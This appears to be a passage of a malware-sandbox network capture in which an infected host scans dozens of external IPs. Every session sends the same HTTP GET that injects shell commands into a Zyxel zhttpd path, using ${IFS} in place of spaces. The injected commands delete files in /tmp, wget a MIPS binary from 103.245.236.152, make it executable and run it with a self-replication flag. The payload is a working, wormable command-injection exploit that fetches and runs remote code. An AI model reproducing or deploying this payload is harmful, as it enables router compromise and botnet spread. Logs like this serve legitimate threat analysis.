                                      Jan 14, 2024 15:50:41.175949097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3088192.168.2.143447427.172.115.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176006079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3089192.168.2.1460232126.38.42.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176094055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3090192.168.2.144715485.252.147.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176120043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3091192.168.2.144807218.155.18.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176199913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3092192.168.2.1457626195.30.78.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176261902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3093192.168.2.1438636101.212.84.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176318884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3094192.168.2.144137631.226.67.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176367044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3095192.168.2.1438204102.222.87.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176436901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3096192.168.2.145866435.42.211.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176480055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3097192.168.2.144827054.113.229.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176556110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3098192.168.2.1436964110.119.134.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176594019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3099192.168.2.145555886.156.28.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176672935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3100192.168.2.1440578166.125.179.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176718950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3101192.168.2.143478659.161.54.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176759958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3102192.168.2.1449114201.188.126.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176824093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3103192.168.2.1437368207.136.212.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176883936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3104192.168.2.144011088.180.86.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.176955938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3105192.168.2.1456566122.55.170.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177010059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3106192.168.2.145808061.207.233.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177079916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3107192.168.2.1440918158.255.167.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177144051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3108192.168.2.1453284201.88.0.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177202940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3109192.168.2.1434364172.78.92.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177264929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3110192.168.2.1451730223.161.67.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177351952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3111192.168.2.1452910200.90.150.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177405119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3112192.168.2.145600847.93.115.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177457094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3113192.168.2.144727414.221.145.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177508116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3114192.168.2.1458698144.145.253.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177571058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3115192.168.2.1439180150.110.63.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177608967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3116192.168.2.144129047.218.232.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177640915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3117192.168.2.1440860143.60.47.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177685976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3118192.168.2.1449824101.250.238.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177752018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3119192.168.2.145493679.41.174.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177809954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3120192.168.2.144650425.118.237.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177861929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3121192.168.2.1460872183.83.219.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177917957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3122192.168.2.1451878118.120.112.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.177985907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3123192.168.2.144380079.121.248.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178035021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3124192.168.2.1449748167.60.30.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178086996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3125192.168.2.145599627.198.230.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178133011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3126192.168.2.1455672102.226.199.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178196907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3127192.168.2.145958820.6.220.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178262949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3128192.168.2.1459884196.158.139.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178312063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3129192.168.2.145632472.177.125.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178355932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3130192.168.2.143453047.164.127.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178422928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3131192.168.2.1451476115.66.121.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.178483009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3132192.168.2.14526842.130.21.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183547020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3133192.168.2.1459204193.247.173.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183592081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3134192.168.2.143920470.53.72.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183657885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3135192.168.2.1438352128.101.90.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183729887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3136192.168.2.145419650.198.30.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183774948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3137192.168.2.1455256193.89.151.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183825016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3138192.168.2.145870444.31.63.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183882952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3139192.168.2.144973637.160.0.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.183948040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3140192.168.2.143403689.7.101.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184007883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3141192.168.2.1451646189.61.176.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184040070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3142192.168.2.1442918154.181.211.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184098005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3143192.168.2.144266274.122.173.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184170008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3144192.168.2.143658268.200.45.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184214115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3145192.168.2.1437266135.165.180.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184258938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3146192.168.2.143654279.127.13.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184299946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3147192.168.2.1459164101.28.153.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.184360027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3148192.168.2.144833037.169.57.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200176954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3149192.168.2.1437124171.247.226.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.200315952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3150192.168.2.1457672156.74.30.192443
                                      TimestampBytes transferredDirectionData
